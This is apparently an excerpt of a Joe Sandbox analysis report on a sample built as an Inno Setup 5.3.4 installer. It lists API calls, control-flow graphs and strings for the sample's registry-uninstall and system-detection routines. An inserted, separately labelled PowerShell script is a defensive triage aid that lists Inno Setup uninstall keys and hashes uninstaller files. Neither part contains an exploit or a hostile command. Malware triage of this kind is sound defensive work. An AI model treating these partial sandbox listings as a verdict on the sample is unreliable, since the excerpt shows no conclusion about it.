                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          • Opcode ID: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                          • Instruction ID: 3fcbdb993abfa6ff85d44bbf729c32bfcaea701f4f0f62c70188b68341c8b9af
                                                                          • Opcode Fuzzy Hash: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                          • Instruction Fuzzy Hash: 57315370A00108DBDB10EB65C885ADEB7A8DF45304F55C0B6E448AB7A2D738DF419B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00447F9D), ref: 00447EE0
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00447F61
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 2574300362-0
                                                                          • Opcode ID: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                          • Instruction ID: 0540f09e741ba6bdaccbcd33a6618944dfbf5ea3d39d596ba1fc0c584366e1b5
                                                                          • Opcode Fuzzy Hash: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                          • Instruction Fuzzy Hash: 87514574E04105AFDB00EF95C481AAEB7F9EF44315F1081BBE814BB391DB389E058B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451421
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451429
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          • Opcode ID: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                          • Instruction ID: e37cade2724d1815d1fa35268cc527e6c5f68d3fdc0659cff19e79a06527a77b
                                                                          • Opcode Fuzzy Hash: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                          • Instruction Fuzzy Hash: AFF04931A00204AB8B10EFA69C4149EF7ECDB4672676086BBFC14E3692DA784D048558
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                          • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                          • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                          • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                          • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                          • Opcode Fuzzy Hash: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
                                                                          • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                          • Instruction ID: 0cfc6298fdd12068752ce7e5f45c2d53baaa1050ce66cc5593b8e4691a5d7c37
                                                                          • Opcode Fuzzy Hash: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                          • Instruction Fuzzy Hash: 69D0C2B120420053C300AE68DC8269635AC8B84356F10483E7C85CB3C3EA7CDF4D566A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042ED70
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                          • Instruction ID: 792271a71424278b40c344544890263380edecd1d6d7572d4222c7646c861560
                                                                          • Opcode Fuzzy Hash: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                          • Instruction Fuzzy Hash: 0FD05E7121010DAB8B00DE99E880C6B33AC9B88740B608805F518C7205C634EC1087A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 409 46aa8c-46aabc 410 46aac7 409->410 411 46aabe-46aac5 409->411 412 46aace-46ab06 call 403634 call 403738 call 42dcf8 410->412 411->412 419 46ab21-46ab4a call 403738 call 42dc1c 412->419 420 46ab08-46ab1c call 403738 call 42dcf8 412->420 428 46ab4c-46ab55 call 46a75c 419->428 429 46ab5a-46ab83 call 46a878 419->429 420->419 428->429 433 46ab95-46ab98 call 403400 429->433 434 46ab85-46ab93 call 403494 429->434 438 46ab9d-46abe8 call 46a878 call 42c36c call 46a8c0 call 46a878 433->438 434->438 447 46abfe-46ac1f call 453d04 call 46a878 438->447 448 46abea-46abfd call 46a8e8 438->448 455 46ac75-46ac7c 447->455 456 46ac21-46ac74 call 46a878 call 4746ec call 46a878 call 4746ec call 46a878 447->456 448->447 457 46ac7e-46acbb call 4746ec call 46a878 call 4746ec call 46a878 455->457 458 46acbc-46acc3 455->458 456->455 457->458 461 46ad04-46ad08 458->461 462 46acc5-46ad03 call 46a878 * 3 458->462 466 46ad17-46ad20 call 403494 461->466 467 46ad0a-46ad15 call 476f14 461->467 462->461 474 46ad25-46aef2 call 403778 call 46a878 call 476f14 call 46a8c0 call 403494 call 40357c * 2 call 46a878 call 403494 call 40357c * 2 call 46a878 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 466->474 467->474 553 46aef4-46af06 call 46a878 474->553 554 46af08-46af16 call 46a8e8 474->554 559 46af1c-46af65 call 46a8e8 call 46a91c call 46a878 call 476f14 call 46a980 553->559 558 46af1b 554->558 558->559 570 46af67-46af85 call 46a8e8 * 2 559->570 571 46af8b-46af92 559->571 579 46af8a 570->579 573 46af94-46afca call 48ebc0 571->573 574 46afec-46b002 RegCloseKey 571->574 573->574 579->571
                                                                          APIs
                                                                            • Part of subcall function 0046A878: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                          • RegCloseKey.ADVAPI32(?,0046B00A,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B055,?,?,00000001,004950AC), ref: 0046AFFD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: " /SILENT$5.3.4 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3132538880-4027905794
                                                                          • Opcode ID: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                          • Instruction ID: bcc948474739f7d4ff28eebc8c8e5d3f87406a7e72996d7d4e0226daa9b19a94
                                                                          • Opcode Fuzzy Hash: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                          • Instruction Fuzzy Hash: 70F15870A005099BCB04EB55D8519AEB7B9EB44304F60C07BE811AB395EB78BD46CF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
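
                                                                          The function above writes the standard Inno Setup uninstall entry (an Uninstall subkey ending in "_is1" carrying DisplayName, UninstallString, QuietUninstallString, InstallLocation and the "Inno Setup: ..." metadata values), and the report's string list places "5.3.4 (a)" beside the "Inno Setup: Setup Version" value name. The following PowerShell is an added triage script, not code from the Joe Sandbox report or from the sample: it enumerates those keys on a live host, pulls the fields an analyst pivots on, and hashes the unins*.* files the installer leaves in InstallLocation (the report shows the sample searching for "unins???.*"). It assumes the script runs elevated and that the installer completed and registered under one of the three standard Uninstall hives; the report does not state which hive or which AppId this sample uses, so the function name and the hive list are the script's own choices.

```powershell
# Added triage example; not from the Joe Sandbox report and not the sample's code.
# Assumptions: run elevated; the Inno Setup installer finished and wrote its
# "<AppId>_is1" key to one of the standard Uninstall hives listed below.

$uninstallHives = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
)

# Value names the report shows being written via RegSetValueExA in sub_46A878.
$fields = @(
    'DisplayName', 'DisplayVersion', 'Publisher', 'InstallDate', 'InstallLocation',
    'UninstallString', 'QuietUninstallString', 'DisplayIcon',
    'Inno Setup: Setup Version', 'Inno Setup: App Path', 'Inno Setup: User',
    'Inno Setup: Selected Tasks', 'Inno Setup: Setup Type'
)

function Get-InnoSetupInstalls {
    # Optional filter on the engine version string, e.g. '5.3.4 (a)' as seen in the report.
    param([string]$SetupVersionFilter = $null)

    foreach ($hive in $uninstallHives) {
        if (-not (Test-Path -Path $hive)) { continue }
        Get-ChildItem -Path $hive -ErrorAction SilentlyContinue |
            Where-Object { $_.PSChildName -like '*_is1' } |
            ForEach-Object {
                $props = Get-ItemProperty -Path $_.PSPath
                $ver   = $props.'Inno Setup: Setup Version'
                # 'return' inside ForEach-Object skips to the next key.
                if ($SetupVersionFilter -and $ver -ne $SetupVersionFilter) { return }

                $entry = [ordered]@{ Key = $_.Name }
                foreach ($f in $fields) { $entry[$f] = $props.$f }

                # Hash the uninstaller artifacts left in the install directory; the
                # report shows the installer enumerating "unins???.*" there.
                $loc = $props.InstallLocation
                if ($loc -and (Test-Path -Path $loc)) {
                    $entry['UninsFiles'] = Get-ChildItem -Path $loc -Filter 'unins*.*' -File -ErrorAction SilentlyContinue |
                        ForEach-Object {
                            '{0}  {1}' -f (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash, $_.Name
                        }
                }
                [pscustomobject]$entry
            }
    }
}

# Usage: every Inno Setup install on the host, then only those built with the
# engine version string the report associates with this sample.
Get-InnoSetupInstalls | Format-List
Get-InnoSetupInstalls -SetupVersionFilter '5.3.4 (a)' | Format-List
```

                                                                          A QuietUninstallString ending in " /SILENT" is normal for any Inno Setup build and is not by itself an indicator; the useful pivots are InstallLocation (where the dropped files live), the unins*.* hashes, and the Setup Version string, which narrows the hunt to installers produced with the same toolchain as this sample.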

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 972 48c62c-48c660 call 403684 975 48c662-48c671 call 446830 Sleep 972->975 976 48c676-48c683 call 403684 972->976 981 48cb06-48cb20 call 403420 975->981 982 48c6b2-48c6bf call 403684 976->982 983 48c685-48c6a8 call 44688c call 403738 FindWindowA call 446b0c 976->983 990 48c6ee-48c6fb call 403684 982->990 991 48c6c1-48c6e9 call 44688c call 403738 FindWindowA call 446b0c 982->991 999 48c6ad 983->999 1001 48c6fd-48c73f call 446830 * 4 SendMessageA call 446b0c 990->1001 1002 48c744-48c751 call 403684 990->1002 991->981 999->981 1001->981 1011 48c7a0-48c7ad call 403684 1002->1011 1012 48c753-48c79b call 446830 * 4 PostMessageA call 446964 1002->1012 1021 48c7fc-48c809 call 403684 1011->1021 1022 48c7af-48c7f7 call 446830 * 4 SendNotifyMessageA call 446964 1011->1022 1012->981 1033 48c80b-48c831 call 44688c call 403738 RegisterClipboardFormatA call 446b0c 1021->1033 1034 48c836-48c843 call 403684 1021->1034 1022->981 1033->981 1046 48c884-48c891 call 403684 1034->1046 1047 48c845-48c87f call 446830 * 3 SendMessageA call 446b0c 1034->1047 1061 48c8d8-48c8e5 call 403684 1046->1061 1062 48c893-48c8d3 call 446830 * 3 PostMessageA call 446964 1046->1062 1047->981 1073 48c92c-48c939 call 403684 1061->1073 1074 48c8e7-48c927 call 446830 * 3 SendNotifyMessageA call 446964 1061->1074 1062->981 1084 48c93b-48c959 call 44688c call 42e1f0 1073->1084 1085 48c98e-48c99b call 403684 1073->1085 1074->981 1105 48c96b-48c979 GetLastError call 446b0c 1084->1105 1106 48c95b-48c969 call 446b0c 1084->1106 1096 48c99d-48c9c9 call 44688c call 403738 call 446830 GetProcAddress 1085->1096 1097 48ca15-48ca22 call 403684 1085->1097 1130 48c9cb-48ca00 call 446830 * 2 call 446b0c call 446964 1096->1130 1131 48ca05-48ca10 call 446964 1096->1131 1111 48ca4a-48ca57 call 403684 1097->1111 1112 48ca24-48ca45 call 446830 FreeLibrary call 446964 1097->1112 1114 48c97e-48c989 call 446b0c 1105->1114 1106->1114 1124 48ca59-48ca77 call 44688c call 403738 CreateMutexA 1111->1124 1125 48ca7c-48ca89 call 403684 1111->1125 1112->981 1114->981 1124->981 1139 48ca8b-48cabd call 4869a8 call 403574 call 403738 OemToCharBuffA call 4869c0 1125->1139 1140 48cabf-48cacc call 403684 1125->1140 1130->981 1131->981 1139->981 1149 48cace-48cb00 call 4869a8 call 403574 call 403738 CharToOemBuffA call 4869c0 1140->1149 1150 48cb02 1140->1150 1149->981 1150->981
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,0048CB21,?,?,?,?,00000000,00000000,00000000), ref: 0048C66C
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 0048C69D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309
                                                                          • Opcode ID: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                          • Instruction ID: f524c342f64002353724253178373006bfdacafd8b11f716a45f6a977dbd9a74
                                                                          • Opcode Fuzzy Hash: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                          • Instruction Fuzzy Hash: 70C18560B0061027D714FB7E9C8261E66999F95704B11DD3FB446EB78ACE3DEC05836E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1477 47dc90-47dcb5 GetModuleHandleA GetProcAddress 1478 47dcb7-47dccd GetNativeSystemInfo GetProcAddress 1477->1478 1479 47dd1c-47dd21 GetSystemInfo 1477->1479 1480 47dd26-47dd2f 1478->1480 1481 47dccf-47dcda GetCurrentProcess 1478->1481 1479->1480 1482 47dd31-47dd35 1480->1482 1483 47dd3f-47dd46 1480->1483 1481->1480 1490 47dcdc-47dce0 1481->1490 1484 47dd37-47dd3b 1482->1484 1485 47dd48-47dd4f 1482->1485 1486 47dd61-47dd66 1483->1486 1488 47dd51-47dd58 1484->1488 1489 47dd3d-47dd5a 1484->1489 1485->1486 1488->1486 1489->1486 1490->1480 1492 47dce2-47dce9 call 4510a0 1490->1492 1492->1480 1495 47dceb-47dcf8 GetProcAddress 1492->1495 1495->1480 1496 47dcfa-47dd11 GetModuleHandleA GetProcAddress 1495->1496 1496->1480 1497 47dd13-47dd1a 1496->1497 1497->1480
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047DCA1
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047DCAE
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DCBC
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047DCC4
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047DCD0
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047DCF1
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047DD04
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047DD0A
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DD21
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                          • Instruction ID: 9223080a01aab665d55f2b56f17608545a072cc335287f1292a6e5765a842dfc
                                                                          • Opcode Fuzzy Hash: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                          • Instruction Fuzzy Hash: AD11E241C2574094EA31B7B58E4ABFB2678CF12758F18C43B784C662C3D67CD8448A6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

Control-flow graph of the function at 0x4651a8 (basic blocks 4651a8-4653dc; opens the Inno Setup uninstall key under Software\Microsoft\Windows\CurrentVersion\Uninstall via subcall 0042DC54 and reads the "Inno Setup: ..." values, then calls RegCloseKey; graph rendering omitted)
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,004653C2,?,?,00000001,00000000,00000000,004653DD,?,00000000,00000000,?), ref: 004653AB
                                                                          Strings
                                                                          • Inno Setup: User Info: Organization, xrefs: 0046537A
                                                                          • Inno Setup: App Path, xrefs: 0046526A
                                                                          • Inno Setup: User Info: Serial, xrefs: 0046538D
                                                                          • Inno Setup: Deselected Components, xrefs: 004652EC
                                                                          • Inno Setup: Icon Group, xrefs: 00465286
                                                                          • Inno Setup: Selected Components, xrefs: 004652CA
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00465339
                                                                          • Inno Setup: User Info: Name, xrefs: 00465367
                                                                          • Inno Setup: Selected Tasks, xrefs: 00465317
                                                                          • Inno Setup: Setup Type, xrefs: 004652BA
                                                                          • %s\%s_is1, xrefs: 00465225
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00465207
                                                                          • Inno Setup: No Icons, xrefs: 00465293
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                          • Instruction ID: 4ab213a2d8ea7f563b4f24483654b6d3db0bb1d5b93a3c7cd1a46aaae94220a2
                                                                          • Opcode Fuzzy Hash: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                          • Instruction Fuzzy Hash: 5251D630A00A449BCB11DB65D9517DEBBF5EF44344FA084BAE844A7392E778AF45CB09
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

Control-flow graph of the function at 0x4237e4 (basic blocks 4237e4-42391b; GetClassInfoA/RegisterClassA, GetSystemMetrics, SetWindowLongA, SendMessageA, then GetSystemMenu and three DeleteMenu calls; graph rendering omitted)
                                                                          APIs
                                                                            • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                          • GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
                                                                          • RegisterClassA.USER32(00493630), ref: 00423827
                                                                          • GetSystemMetrics.USER32(00000000), ref: 00423849
                                                                          • GetSystemMetrics.USER32(00000001), ref: 00423858
                                                                          • SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
                                                                          • SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
                                                                          • GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
